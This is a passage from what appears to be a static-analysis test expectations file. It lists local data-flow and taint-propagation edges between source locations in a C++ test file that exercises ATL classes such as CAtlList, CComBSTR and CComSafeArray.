atl.cpp:341:14:341:18 | list8 | | +| atl.cpp:338:29:338:31 | call to CAtlList | atl.cpp:342:7:342:7 | list8 | | +| atl.cpp:339:20:339:24 | ref arg list8 | atl.cpp:340:9:340:13 | list8 | | +| atl.cpp:339:20:339:24 | ref arg list8 | atl.cpp:341:14:341:18 | list8 | | +| atl.cpp:339:20:339:24 | ref arg list8 | atl.cpp:342:7:342:7 | list8 | | +| atl.cpp:339:26:339:40 | call to GetTailPosition | atl.cpp:340:28:340:30 | pos | | +| atl.cpp:340:9:340:13 | ref arg list8 | atl.cpp:341:14:341:18 | list8 | | +| atl.cpp:340:9:340:13 | ref arg list8 | atl.cpp:342:7:342:7 | list8 | | +| atl.cpp:341:14:341:18 | ref arg list8 | atl.cpp:342:7:342:7 | list8 | | +| atl.cpp:344:29:344:30 | 10 | atl.cpp:344:29:344:31 | call to CAtlList | TAINT | +| atl.cpp:344:29:344:31 | call to CAtlList | atl.cpp:345:9:345:13 | list9 | | +| atl.cpp:344:29:344:31 | call to CAtlList | atl.cpp:345:21:345:25 | list9 | | +| atl.cpp:344:29:344:31 | call to CAtlList | atl.cpp:346:14:346:18 | list9 | | +| atl.cpp:344:29:344:31 | call to CAtlList | atl.cpp:347:7:347:7 | list9 | | +| atl.cpp:345:9:345:13 | ref arg list9 | atl.cpp:346:14:346:18 | list9 | | +| atl.cpp:345:9:345:13 | ref arg list9 | atl.cpp:347:7:347:7 | list9 | | +| atl.cpp:345:21:345:25 | ref arg list9 | atl.cpp:345:9:345:13 | list9 | | +| atl.cpp:345:21:345:25 | ref arg list9 | atl.cpp:346:14:346:18 | list9 | | +| atl.cpp:345:21:345:25 | ref arg list9 | atl.cpp:347:7:347:7 | list9 | | +| atl.cpp:346:14:346:18 | ref arg list9 | atl.cpp:347:7:347:7 | list9 | | +| atl.cpp:350:14:350:33 | call to indirect_source | atl.cpp:354:20:354:20 | p | | +| atl.cpp:350:14:350:33 | call to indirect_source | atl.cpp:362:21:362:21 | p | | +| atl.cpp:350:14:350:33 | call to indirect_source | atl.cpp:371:31:371:31 | p | | +| atl.cpp:350:14:350:33 | call to indirect_source | atl.cpp:377:23:377:23 | p | | +| atl.cpp:350:14:350:33 | call to indirect_source | atl.cpp:385:32:385:32 | p | | +| atl.cpp:350:14:350:33 | call to indirect_source | atl.cpp:392:33:392:33 | p | | +| atl.cpp:350:14:350:33 | call to indirect_source | atl.cpp:397:46:397:46 | p | | +| atl.cpp:352:27:352:28 | 10 | atl.cpp:352:27:352:29 | call to CAtlList | TAINT | +| atl.cpp:352:27:352:29 | call to CAtlList | atl.cpp:353:12:353:15 | list | | +| atl.cpp:352:27:352:29 | call to CAtlList | atl.cpp:354:7:354:10 | list | | +| atl.cpp:352:27:352:29 | call to CAtlList | atl.cpp:355:12:355:15 | list | | +| atl.cpp:352:27:352:29 | call to CAtlList | atl.cpp:358:26:358:29 | list | | +| atl.cpp:352:27:352:29 | call to CAtlList | atl.cpp:400:5:400:5 | list | | +| atl.cpp:353:12:353:15 | ref arg list | atl.cpp:354:7:354:10 | list | | +| atl.cpp:353:12:353:15 | ref arg list | atl.cpp:355:12:355:15 | list | | +| atl.cpp:353:12:353:15 | ref arg list | atl.cpp:358:26:358:29 | list | | +| atl.cpp:353:12:353:15 | ref arg list | atl.cpp:400:5:400:5 | list | | +| atl.cpp:354:7:354:10 | ref arg list | atl.cpp:355:12:355:15 | list | | +| atl.cpp:354:7:354:10 | ref arg list | atl.cpp:358:26:358:29 | list | | +| atl.cpp:354:7:354:10 | ref arg list | atl.cpp:400:5:400:5 | list | | +| atl.cpp:355:12:355:15 | ref arg list | atl.cpp:358:26:358:29 | list | | +| atl.cpp:355:12:355:15 | ref arg list | atl.cpp:400:5:400:5 | list | | +| atl.cpp:357:28:357:29 | 10 | atl.cpp:357:28:357:30 | call to CAtlList | TAINT | +| atl.cpp:357:28:357:30 | call to CAtlList | atl.cpp:358:7:358:11 | list2 | | +| atl.cpp:357:28:357:30 | call to CAtlList | atl.cpp:359:12:359:16 | list2 | | +| atl.cpp:357:28:357:30 | call to CAtlList | atl.cpp:400:5:400:5 | list2 | | +| atl.cpp:358:7:358:11 | ref arg list2 | atl.cpp:359:12:359:16 | list2 | | +| atl.cpp:358:7:358:11 | ref arg list2 | atl.cpp:400:5:400:5 | list2 | | +| atl.cpp:358:26:358:29 | list | atl.cpp:358:25:358:29 | & ... | | +| atl.cpp:359:12:359:16 | ref arg list2 | atl.cpp:400:5:400:5 | list2 | | +| atl.cpp:361:28:361:29 | 10 | atl.cpp:361:28:361:30 | call to CAtlList | TAINT | +| atl.cpp:361:28:361:30 | call to CAtlList | atl.cpp:362:7:362:11 | list3 | | +| atl.cpp:361:28:361:30 | call to CAtlList | atl.cpp:363:12:363:16 | list3 | | +| atl.cpp:361:28:361:30 | call to CAtlList | atl.cpp:366:26:366:30 | list3 | | +| atl.cpp:361:28:361:30 | call to CAtlList | atl.cpp:400:5:400:5 | list3 | | +| atl.cpp:362:7:362:11 | ref arg list3 | atl.cpp:363:12:363:16 | list3 | | +| atl.cpp:362:7:362:11 | ref arg list3 | atl.cpp:366:26:366:30 | list3 | | +| atl.cpp:362:7:362:11 | ref arg list3 | atl.cpp:400:5:400:5 | list3 | | +| atl.cpp:363:12:363:16 | ref arg list3 | atl.cpp:366:26:366:30 | list3 | | +| atl.cpp:363:12:363:16 | ref arg list3 | atl.cpp:400:5:400:5 | list3 | | +| atl.cpp:365:28:365:29 | 10 | atl.cpp:365:28:365:30 | call to CAtlList | TAINT | +| atl.cpp:365:28:365:30 | call to CAtlList | atl.cpp:366:7:366:11 | list4 | | +| atl.cpp:365:28:365:30 | call to CAtlList | atl.cpp:367:12:367:16 | list4 | | +| atl.cpp:365:28:365:30 | call to CAtlList | atl.cpp:400:5:400:5 | list4 | | +| atl.cpp:366:7:366:11 | ref arg list4 | atl.cpp:367:12:367:16 | list4 | | +| atl.cpp:366:7:366:11 | ref arg list4 | atl.cpp:400:5:400:5 | list4 | | +| atl.cpp:366:26:366:30 | list3 | atl.cpp:366:25:366:30 | & ... | | +| atl.cpp:367:12:367:16 | ref arg list4 | atl.cpp:400:5:400:5 | list4 | | +| atl.cpp:370:30:370:31 | 10 | atl.cpp:370:30:370:32 | call to CAtlList | TAINT | +| atl.cpp:370:30:370:32 | call to CAtlList | atl.cpp:371:20:371:24 | list5 | | +| atl.cpp:370:30:370:32 | call to CAtlList | atl.cpp:371:34:371:38 | list5 | | +| atl.cpp:370:30:370:32 | call to CAtlList | atl.cpp:372:14:372:18 | list5 | | +| atl.cpp:370:30:370:32 | call to CAtlList | atl.cpp:373:7:373:7 | list5 | | +| atl.cpp:371:20:371:24 | ref arg list5 | atl.cpp:372:14:372:18 | list5 | | +| atl.cpp:371:20:371:24 | ref arg list5 | atl.cpp:373:7:373:7 | list5 | | +| atl.cpp:371:26:371:29 | call to Find | atl.cpp:372:26:372:28 | pos | | +| atl.cpp:371:34:371:38 | ref arg list5 | atl.cpp:371:20:371:24 | list5 | | +| atl.cpp:371:34:371:38 | ref arg list5 | atl.cpp:372:14:372:18 | list5 | | +| atl.cpp:371:34:371:38 | ref arg list5 | atl.cpp:373:7:373:7 | list5 | | +| atl.cpp:372:14:372:18 | ref arg list5 | atl.cpp:373:7:373:7 | list5 | | +| atl.cpp:376:30:376:31 | 10 | atl.cpp:376:30:376:32 | call to CAtlList | TAINT | +| atl.cpp:376:30:376:32 | call to CAtlList | atl.cpp:377:9:377:13 | list6 | | +| atl.cpp:376:30:376:32 | call to CAtlList | atl.cpp:378:20:378:24 | list6 | | +| atl.cpp:376:30:376:32 | call to CAtlList | atl.cpp:379:14:379:18 | list6 | | +| atl.cpp:376:30:376:32 | call to CAtlList | atl.cpp:380:7:380:7 | list6 | | +| atl.cpp:377:9:377:13 | ref arg list6 | atl.cpp:378:20:378:24 | list6 | | +| atl.cpp:377:9:377:13 | ref arg list6 | atl.cpp:379:14:379:18 | list6 | | +| atl.cpp:377:9:377:13 | ref arg list6 | atl.cpp:380:7:380:7 | list6 | | +| atl.cpp:378:20:378:24 | ref arg list6 | atl.cpp:379:14:379:18 | list6 | | +| atl.cpp:378:20:378:24 | ref arg list6 | atl.cpp:380:7:380:7 | list6 | | +| atl.cpp:378:26:378:34 | call to FindIndex | atl.cpp:379:26:379:28 | pos | | +| atl.cpp:379:14:379:18 | ref arg list6 | atl.cpp:380:7:380:7 | list6 | | +| atl.cpp:383:30:383:31 | 10 | atl.cpp:383:30:383:32 | call to CAtlList | TAINT | +| atl.cpp:383:30:383:32 | call to CAtlList | atl.cpp:384:20:384:24 | list7 | | +| atl.cpp:383:30:383:32 | call to CAtlList | atl.cpp:385:9:385:13 | list7 | | +| atl.cpp:383:30:383:32 | call to CAtlList | atl.cpp:386:14:386:18 | list7 | | +| atl.cpp:383:30:383:32 | call to CAtlList | atl.cpp:387:7:387:7 | list7 | | +| atl.cpp:384:20:384:24 | ref arg list7 | atl.cpp:385:9:385:13 | list7 | | +| atl.cpp:384:20:384:24 | ref arg list7 | atl.cpp:386:14:386:18 | list7 | | +| atl.cpp:384:20:384:24 | ref arg list7 | atl.cpp:387:7:387:7 | list7 | | +| atl.cpp:384:26:384:40 | call to GetTailPosition | atl.cpp:385:27:385:29 | pos | | +| atl.cpp:385:9:385:13 | ref arg list7 | atl.cpp:386:14:386:18 | list7 | | +| atl.cpp:385:9:385:13 | ref arg list7 | atl.cpp:387:7:387:7 | list7 | | +| atl.cpp:386:14:386:18 | ref arg list7 | atl.cpp:387:7:387:7 | list7 | | +| atl.cpp:390:30:390:31 | 10 | atl.cpp:390:30:390:32 | call to CAtlList | TAINT | +| atl.cpp:390:30:390:32 | call to CAtlList | atl.cpp:391:20:391:24 | list8 | | +| atl.cpp:390:30:390:32 | call to CAtlList | atl.cpp:392:9:392:13 | list8 | | +| atl.cpp:390:30:390:32 | call to CAtlList | atl.cpp:393:14:393:18 | list8 | | +| atl.cpp:390:30:390:32 | call to CAtlList | atl.cpp:394:7:394:7 | list8 | | +| atl.cpp:391:20:391:24 | ref arg list8 | atl.cpp:392:9:392:13 | list8 | | +| atl.cpp:391:20:391:24 | ref arg list8 | atl.cpp:393:14:393:18 | list8 | | +| atl.cpp:391:20:391:24 | ref arg list8 | atl.cpp:394:7:394:7 | list8 | | +| atl.cpp:391:26:391:40 | call to GetTailPosition | atl.cpp:392:28:392:30 | pos | | +| atl.cpp:392:9:392:13 | ref arg list8 | atl.cpp:393:14:393:18 | list8 | | +| atl.cpp:392:9:392:13 | ref arg list8 | atl.cpp:394:7:394:7 | list8 | | +| atl.cpp:393:14:393:18 | ref arg list8 | atl.cpp:394:7:394:7 | list8 | | +| atl.cpp:396:30:396:31 | 10 | atl.cpp:396:30:396:32 | call to CAtlList | TAINT | +| atl.cpp:396:30:396:32 | call to CAtlList | atl.cpp:397:9:397:13 | list9 | | +| atl.cpp:396:30:396:32 | call to CAtlList | atl.cpp:397:21:397:25 | list9 | | +| atl.cpp:396:30:396:32 | call to CAtlList | atl.cpp:398:14:398:18 | list9 | | +| atl.cpp:396:30:396:32 | call to CAtlList | atl.cpp:399:7:399:7 | list9 | | +| atl.cpp:397:9:397:13 | ref arg list9 | atl.cpp:398:14:398:18 | list9 | | +| atl.cpp:397:9:397:13 | ref arg list9 | atl.cpp:399:7:399:7 | list9 | | +| atl.cpp:397:21:397:25 | ref arg list9 | atl.cpp:397:9:397:13 | list9 | | +| atl.cpp:397:21:397:25 | ref arg list9 | atl.cpp:398:14:398:18 | list9 | | +| atl.cpp:397:21:397:25 | ref arg list9 | atl.cpp:399:7:399:7 | list9 | | +| atl.cpp:398:14:398:18 | ref arg list9 | atl.cpp:399:7:399:7 | list9 | | +| atl.cpp:456:23:456:35 | new | atl.cpp:457:5:457:8 | safe | | +| atl.cpp:456:23:456:35 | new | atl.cpp:458:12:458:15 | safe | | +| atl.cpp:457:5:457:8 | safe [post update] | atl.cpp:458:12:458:15 | safe | | +| atl.cpp:457:5:457:42 | ... = ... | atl.cpp:457:11:457:16 | pvData [post update] | | +| atl.cpp:457:20:457:40 | call to indirect_source | atl.cpp:457:5:457:42 | ... = ... | | +| atl.cpp:462:15:462:35 | call to indirect_source | atl.cpp:464:18:464:18 | x | | +| atl.cpp:462:15:462:35 | call to indirect_source | atl.cpp:471:22:471:22 | x | | +| atl.cpp:462:15:462:35 | call to indirect_source | atl.cpp:475:18:475:18 | x | | +| atl.cpp:462:15:462:35 | call to indirect_source | atl.cpp:483:13:483:13 | x | | +| atl.cpp:462:15:462:35 | call to indirect_source | atl.cpp:497:22:497:22 | x | | +| atl.cpp:464:18:464:18 | x | atl.cpp:464:18:464:19 | call to CComBSTR | TAINT | +| atl.cpp:464:18:464:19 | call to CComBSTR | atl.cpp:465:12:465:12 | b | | +| atl.cpp:464:18:464:19 | call to CComBSTR | atl.cpp:467:19:467:19 | b | | +| atl.cpp:464:18:464:19 | call to CComBSTR | atl.cpp:469:5:469:5 | b | | +| atl.cpp:465:12:465:12 | b [post update] | atl.cpp:467:19:467:19 | b | | +| atl.cpp:465:12:465:12 | b [post update] | atl.cpp:469:5:469:5 | b | | +| atl.cpp:465:14:465:18 | ref arg m_str | atl.cpp:468:15:468:19 | m_str | | +| atl.cpp:467:19:467:19 | b | atl.cpp:467:19:467:20 | call to CComBSTR | | +| atl.cpp:467:19:467:20 | call to CComBSTR | atl.cpp:468:12:468:13 | b2 | | +| atl.cpp:467:19:467:20 | call to CComBSTR | atl.cpp:469:5:469:5 | b2 | | +| atl.cpp:468:12:468:13 | b2 [post update] | atl.cpp:469:5:469:5 | b2 | | +| atl.cpp:471:18:471:23 | call to CComBSTR | atl.cpp:472:12:472:12 | b | | +| atl.cpp:471:18:471:23 | call to CComBSTR | atl.cpp:473:5:473:5 | b | | +| atl.cpp:472:12:472:12 | b [post update] | atl.cpp:473:5:473:5 | b | | +| atl.cpp:475:18:475:18 | x | atl.cpp:475:18:475:19 | call to CComBSTR | TAINT | +| atl.cpp:475:18:475:19 | call to CComBSTR | atl.cpp:479:13:479:13 | b | | +| atl.cpp:475:18:475:19 | call to CComBSTR | atl.cpp:515:5:515:5 | b | | +| atl.cpp:477:16:477:17 | call to CComBSTR | atl.cpp:478:12:478:13 | b2 | | +| atl.cpp:477:16:477:17 | call to CComBSTR | atl.cpp:479:7:479:8 | b2 | | +| atl.cpp:477:16:477:17 | call to CComBSTR | atl.cpp:480:12:480:13 | b2 | | +| atl.cpp:477:16:477:17 | call to CComBSTR | atl.cpp:515:5:515:5 | b2 | | +| atl.cpp:478:12:478:13 | b2 [post update] | atl.cpp:479:7:479:8 | b2 | | +| atl.cpp:478:12:478:13 | b2 [post update] | atl.cpp:480:12:480:13 | b2 | | +| atl.cpp:478:12:478:13 | b2 [post update] | atl.cpp:515:5:515:5 | b2 | | +| atl.cpp:478:15:478:19 | ref arg m_str | atl.cpp:480:15:480:19 | m_str | | +| atl.cpp:479:7:479:8 | ref arg b2 | atl.cpp:480:12:480:13 | b2 | | +| atl.cpp:479:7:479:8 | ref arg b2 | atl.cpp:515:5:515:5 | b2 | | +| atl.cpp:480:12:480:13 | b2 [post update] | atl.cpp:515:5:515:5 | b2 | | +| atl.cpp:482:16:482:17 | call to CComBSTR | atl.cpp:483:7:483:8 | b3 | | +| atl.cpp:482:16:482:17 | call to CComBSTR | atl.cpp:484:12:484:13 | b3 | | +| atl.cpp:482:16:482:17 | call to CComBSTR | atl.cpp:485:30:485:31 | b3 | | +| atl.cpp:482:16:482:17 | call to CComBSTR | atl.cpp:486:15:486:16 | b3 | | +| atl.cpp:482:16:482:17 | call to CComBSTR | atl.cpp:515:5:515:5 | b3 | | +| atl.cpp:483:7:483:8 | ref arg b3 | atl.cpp:484:12:484:13 | b3 | | +| atl.cpp:483:7:483:8 | ref arg b3 | atl.cpp:485:30:485:31 | b3 | | +| atl.cpp:483:7:483:8 | ref arg b3 | atl.cpp:486:15:486:16 | b3 | | +| atl.cpp:483:7:483:8 | ref arg b3 | atl.cpp:515:5:515:5 | b3 | | +| atl.cpp:483:13:483:13 | x | atl.cpp:483:13:483:13 | call to CComBSTR | TAINT | +| atl.cpp:484:12:484:13 | b3 [post update] | atl.cpp:485:30:485:31 | b3 | | +| atl.cpp:484:12:484:13 | b3 [post update] | atl.cpp:486:15:486:16 | b3 | | +| atl.cpp:484:12:484:13 | b3 [post update] | atl.cpp:515:5:515:5 | b3 | | +| atl.cpp:485:30:485:31 | ref arg b3 | atl.cpp:486:15:486:16 | b3 | | +| atl.cpp:485:30:485:31 | ref arg b3 | atl.cpp:515:5:515:5 | b3 | | +| atl.cpp:486:13:486:16 | * ... | atl.cpp:486:12:486:16 | * ... | TAINT | +| atl.cpp:486:14:486:14 | call to operator& | atl.cpp:486:13:486:16 | * ... | TAINT | +| atl.cpp:486:15:486:16 | ref arg b3 | atl.cpp:515:5:515:5 | b3 | | +| atl.cpp:488:16:488:17 | call to CComBSTR | atl.cpp:489:7:489:8 | b4 | | +| atl.cpp:488:16:488:17 | call to CComBSTR | atl.cpp:490:12:490:13 | b4 | | +| atl.cpp:488:16:488:17 | call to CComBSTR | atl.cpp:493:21:493:22 | b4 | | +| atl.cpp:488:16:488:17 | call to CComBSTR | atl.cpp:515:5:515:5 | b4 | | +| atl.cpp:489:7:489:8 | ref arg b4 | atl.cpp:490:12:490:13 | b4 | | +| atl.cpp:489:7:489:8 | ref arg b4 | atl.cpp:493:21:493:22 | b4 | | +| atl.cpp:489:7:489:8 | ref arg b4 | atl.cpp:515:5:515:5 | b4 | | +| atl.cpp:490:12:490:13 | b4 [post update] | atl.cpp:493:21:493:22 | b4 | | +| atl.cpp:490:12:490:13 | b4 [post update] | atl.cpp:515:5:515:5 | b4 | | +| atl.cpp:490:15:490:19 | ref arg m_str | atl.cpp:493:24:493:28 | m_str | | +| atl.cpp:492:16:492:17 | call to CComBSTR | atl.cpp:493:7:493:8 | b5 | | +| atl.cpp:492:16:492:17 | call to CComBSTR | atl.cpp:494:12:494:13 | b5 | | +| atl.cpp:492:16:492:17 | call to CComBSTR | atl.cpp:515:5:515:5 | b5 | | +| atl.cpp:493:7:493:8 | ref arg b5 | atl.cpp:494:12:494:13 | b5 | | +| atl.cpp:493:7:493:8 | ref arg b5 | atl.cpp:515:5:515:5 | b5 | | +| atl.cpp:493:21:493:22 | b4 [post update] | atl.cpp:515:5:515:5 | b4 | | +| atl.cpp:494:12:494:13 | b5 [post update] | atl.cpp:515:5:515:5 | b5 | | +| atl.cpp:496:16:496:17 | call to CComBSTR | atl.cpp:497:7:497:8 | b6 | | +| atl.cpp:496:16:496:17 | call to CComBSTR | atl.cpp:498:12:498:13 | b6 | | +| atl.cpp:496:16:496:17 | call to CComBSTR | atl.cpp:515:5:515:5 | b6 | | +| atl.cpp:497:7:497:8 | ref arg b6 | atl.cpp:498:12:498:13 | b6 | | +| atl.cpp:497:7:497:8 | ref arg b6 | atl.cpp:515:5:515:5 | b6 | | +| atl.cpp:498:12:498:13 | b6 [post update] | atl.cpp:515:5:515:5 | b6 | | +| atl.cpp:500:16:500:17 | call to CComBSTR | atl.cpp:501:7:501:8 | b7 | | +| atl.cpp:500:16:500:17 | call to CComBSTR | atl.cpp:502:12:502:13 | b7 | | +| atl.cpp:500:16:500:17 | call to CComBSTR | atl.cpp:505:21:505:22 | b7 | | +| atl.cpp:500:16:500:17 | call to CComBSTR | atl.cpp:515:5:515:5 | b7 | | +| atl.cpp:501:7:501:8 | ref arg b7 | atl.cpp:502:12:502:13 | b7 | | +| atl.cpp:501:7:501:8 | ref arg b7 | atl.cpp:505:21:505:22 | b7 | | +| atl.cpp:501:7:501:8 | ref arg b7 | atl.cpp:515:5:515:5 | b7 | | +| atl.cpp:502:12:502:13 | b7 [post update] | atl.cpp:505:21:505:22 | b7 | | +| atl.cpp:502:12:502:13 | b7 [post update] | atl.cpp:515:5:515:5 | b7 | | +| atl.cpp:502:15:502:19 | ref arg m_str | atl.cpp:505:24:505:28 | m_str | | +| atl.cpp:504:16:504:17 | call to CComBSTR | atl.cpp:505:7:505:8 | b8 | | +| atl.cpp:504:16:504:17 | call to CComBSTR | atl.cpp:506:12:506:13 | b8 | | +| atl.cpp:504:16:504:17 | call to CComBSTR | atl.cpp:515:5:515:5 | b8 | | +| atl.cpp:505:7:505:8 | ref arg b8 | atl.cpp:506:12:506:13 | b8 | | +| atl.cpp:505:7:505:8 | ref arg b8 | atl.cpp:515:5:515:5 | b8 | | +| atl.cpp:505:21:505:22 | b7 [post update] | atl.cpp:515:5:515:5 | b7 | | +| atl.cpp:506:12:506:13 | b8 [post update] | atl.cpp:515:5:515:5 | b8 | | +| atl.cpp:508:16:508:17 | call to CComBSTR | atl.cpp:510:7:510:8 | b9 | | +| atl.cpp:508:16:508:17 | call to CComBSTR | atl.cpp:511:7:511:8 | b9 | | +| atl.cpp:508:16:508:17 | call to CComBSTR | atl.cpp:514:12:514:13 | b9 | | +| atl.cpp:508:16:508:17 | call to CComBSTR | atl.cpp:515:5:515:5 | b9 | | +| atl.cpp:509:19:509:22 | safe | atl.cpp:511:23:511:26 | safe | | +| atl.cpp:509:19:509:22 | safe | atl.cpp:512:12:512:15 | safe | | +| atl.cpp:510:7:510:8 | ref arg b9 | atl.cpp:511:7:511:8 | b9 | | +| atl.cpp:510:7:510:8 | ref arg b9 | atl.cpp:514:12:514:13 | b9 | | +| atl.cpp:510:7:510:8 | ref arg b9 | atl.cpp:515:5:515:5 | b9 | | +| atl.cpp:511:7:511:8 | ref arg b9 | atl.cpp:514:12:514:13 | b9 | | +| atl.cpp:511:7:511:8 | ref arg b9 | atl.cpp:515:5:515:5 | b9 | | +| atl.cpp:511:22:511:26 | ref arg & ... | atl.cpp:511:23:511:26 | safe [inner post update] | | +| atl.cpp:511:22:511:26 | ref arg & ... | atl.cpp:512:12:512:15 | safe | | +| atl.cpp:511:23:511:26 | safe | atl.cpp:511:22:511:26 | & ... | | +| atl.cpp:514:12:514:13 | ref arg b9 | atl.cpp:515:5:515:5 | b9 | | +| atl.cpp:517:18:517:41 | call to indirect_source | atl.cpp:519:18:519:18 | w | | +| atl.cpp:517:18:517:41 | call to indirect_source | atl.cpp:523:17:523:17 | w | | +| atl.cpp:517:18:517:41 | call to indirect_source | atl.cpp:527:22:527:22 | w | | +| atl.cpp:519:18:519:18 | ref arg w | atl.cpp:523:17:523:17 | w | | +| atl.cpp:519:18:519:18 | ref arg w | atl.cpp:527:22:527:22 | w | | +| atl.cpp:519:18:519:18 | w | atl.cpp:519:18:519:19 | call to CComBSTR | TAINT | +| atl.cpp:519:18:519:19 | call to CComBSTR | atl.cpp:520:12:520:12 | b | | +| atl.cpp:519:18:519:19 | call to CComBSTR | atl.cpp:525:5:525:5 | b | | +| atl.cpp:520:12:520:12 | b [post update] | atl.cpp:525:5:525:5 | b | | +| atl.cpp:522:16:522:17 | call to CComBSTR | atl.cpp:523:7:523:8 | b2 | | +| atl.cpp:522:16:522:17 | call to CComBSTR | atl.cpp:524:12:524:13 | b2 | | +| atl.cpp:522:16:522:17 | call to CComBSTR | atl.cpp:525:5:525:5 | b2 | | +| atl.cpp:523:7:523:8 | ref arg b2 | atl.cpp:524:12:524:13 | b2 | | +| atl.cpp:523:7:523:8 | ref arg b2 | atl.cpp:525:5:525:5 | b2 | | +| atl.cpp:523:17:523:17 | ref arg w | atl.cpp:527:22:527:22 | w | | +| atl.cpp:524:12:524:13 | b2 [post update] | atl.cpp:525:5:525:5 | b2 | | +| atl.cpp:527:18:527:23 | call to CComBSTR | atl.cpp:528:12:528:12 | b | | +| atl.cpp:527:18:527:23 | call to CComBSTR | atl.cpp:529:5:529:5 | b | | +| atl.cpp:528:12:528:12 | b [post update] | atl.cpp:529:5:529:5 | b | | +| atl.cpp:574:24:574:35 | call to getSafeArray | atl.cpp:575:10:575:13 | safe | | +| atl.cpp:574:24:574:35 | call to getSafeArray | atl.cpp:577:26:577:29 | safe | | +| atl.cpp:574:24:574:35 | call to getSafeArray | atl.cpp:588:13:588:16 | safe | | +| atl.cpp:575:10:575:13 | safe [post update] | atl.cpp:577:26:577:29 | safe | | +| atl.cpp:575:10:575:13 | safe [post update] | atl.cpp:588:13:588:16 | safe | | +| atl.cpp:577:26:577:29 | safe | atl.cpp:577:26:577:30 | call to CComSafeArray | TAINT | +| atl.cpp:577:26:577:30 | call to CComSafeArray | atl.cpp:578:10:578:10 | c | | +| atl.cpp:577:26:577:30 | call to CComSafeArray | atl.cpp:579:10:579:10 | c | | +| atl.cpp:577:26:577:30 | call to CComSafeArray | atl.cpp:580:10:580:10 | c | | +| atl.cpp:577:26:577:30 | call to CComSafeArray | atl.cpp:581:10:581:10 | c | | +| atl.cpp:577:26:577:30 | call to CComSafeArray | atl.cpp:582:5:582:5 | c | | +| atl.cpp:578:10:578:10 | ref arg c | atl.cpp:579:10:579:10 | c | | +| atl.cpp:578:10:578:10 | ref arg c | atl.cpp:580:10:580:10 | c | | +| atl.cpp:578:10:578:10 | ref arg c | atl.cpp:581:10:581:10 | c | | +| atl.cpp:578:10:578:10 | ref arg c | atl.cpp:582:5:582:5 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:580:10:580:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:581:10:581:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:582:5:582:5 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:581:10:581:10 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:582:5:582:5 | c | | +| atl.cpp:581:10:581:10 | c [post update] | atl.cpp:582:5:582:5 | c | | +| atl.cpp:584:26:584:26 | call to CComSafeArray | atl.cpp:585:12:585:12 | c | | +| atl.cpp:584:26:584:26 | call to CComSafeArray | atl.cpp:586:12:586:12 | c | | +| atl.cpp:584:26:584:26 | call to CComSafeArray | atl.cpp:587:12:587:12 | c | | +| atl.cpp:584:26:584:26 | call to CComSafeArray | atl.cpp:588:7:588:7 | c | | +| atl.cpp:584:26:584:26 | call to CComSafeArray | atl.cpp:589:12:589:12 | c | | +| atl.cpp:584:26:584:26 | call to CComSafeArray | atl.cpp:590:12:590:12 | c | | +| atl.cpp:584:26:584:26 | call to CComSafeArray | atl.cpp:591:12:591:12 | c | | +| atl.cpp:584:26:584:26 | call to CComSafeArray | atl.cpp:592:37:592:37 | c | | +| atl.cpp:584:26:584:26 | call to CComSafeArray | atl.cpp:593:5:593:5 | c | | +| atl.cpp:585:12:585:12 | ref arg c | atl.cpp:586:12:586:12 | c | | +| atl.cpp:585:12:585:12 | ref arg c | atl.cpp:587:12:587:12 | c | | +| atl.cpp:585:12:585:12 | ref arg c | atl.cpp:588:7:588:7 | c | | +| atl.cpp:585:12:585:12 | ref arg c | atl.cpp:589:12:589:12 | c | | +| atl.cpp:585:12:585:12 | ref arg c | atl.cpp:590:12:590:12 | c | | +| atl.cpp:585:12:585:12 | ref arg c | atl.cpp:591:12:591:12 | c | | +| atl.cpp:585:12:585:12 | ref arg c | atl.cpp:592:37:592:37 | c | | +| atl.cpp:585:12:585:12 | ref arg c | atl.cpp:593:5:593:5 | c | | +| atl.cpp:586:12:586:12 | ref arg c | atl.cpp:587:12:587:12 | c | | +| atl.cpp:586:12:586:12 | ref arg c | atl.cpp:588:7:588:7 | c | | +| atl.cpp:586:12:586:12 | ref arg c | atl.cpp:589:12:589:12 | c | | +| atl.cpp:586:12:586:12 | ref arg c | atl.cpp:590:12:590:12 | c | | +| atl.cpp:586:12:586:12 | ref arg c | atl.cpp:591:12:591:12 | c | | +| atl.cpp:586:12:586:12 | ref arg c | atl.cpp:592:37:592:37 | c | | +| atl.cpp:586:12:586:12 | ref arg c | atl.cpp:593:5:593:5 | c | | +| atl.cpp:587:12:587:12 | ref arg c | atl.cpp:588:7:588:7 | c | | +| atl.cpp:587:12:587:12 | ref arg c | atl.cpp:589:12:589:12 | c | | +| atl.cpp:587:12:587:12 | ref arg c | atl.cpp:590:12:590:12 | c | | +| atl.cpp:587:12:587:12 | ref arg c | atl.cpp:591:12:591:12 | c | | +| atl.cpp:587:12:587:12 | ref arg c | atl.cpp:592:37:592:37 | c | | +| atl.cpp:587:12:587:12 | ref arg c | atl.cpp:593:5:593:5 | c | | +| atl.cpp:588:7:588:7 | ref arg c | atl.cpp:589:12:589:12 | c | | +| atl.cpp:588:7:588:7 | ref arg c | atl.cpp:590:12:590:12 | c | | +| atl.cpp:588:7:588:7 | ref arg c | atl.cpp:591:12:591:12 | c | | +| atl.cpp:588:7:588:7 | ref arg c | atl.cpp:592:37:592:37 | c | | +| atl.cpp:588:7:588:7 | ref arg c | atl.cpp:593:5:593:5 | c | | +| atl.cpp:589:12:589:12 | ref arg c | atl.cpp:590:12:590:12 | c | | +| atl.cpp:589:12:589:12 | ref arg c | atl.cpp:591:12:591:12 | c | | +| atl.cpp:589:12:589:12 | ref arg c | atl.cpp:592:37:592:37 | c | | +| atl.cpp:589:12:589:12 | ref arg c | atl.cpp:593:5:593:5 | c | | +| atl.cpp:590:12:590:12 | ref arg c | atl.cpp:591:12:591:12 | c | | +| atl.cpp:590:12:590:12 | ref arg c | atl.cpp:592:37:592:37 | c | | +| atl.cpp:590:12:590:12 | ref arg c | atl.cpp:593:5:593:5 | c | | +| atl.cpp:591:12:591:12 | ref arg c | atl.cpp:592:37:592:37 | c | | +| atl.cpp:591:12:591:12 | ref arg c | atl.cpp:593:5:593:5 | c | | +| atl.cpp:592:37:592:37 | ref arg c | atl.cpp:593:5:593:5 | c | | +| atl.cpp:595:26:595:26 | call to CComSafeArray | atl.cpp:596:7:596:7 | c | | +| atl.cpp:595:26:595:26 | call to CComSafeArray | atl.cpp:597:12:597:12 | c | | 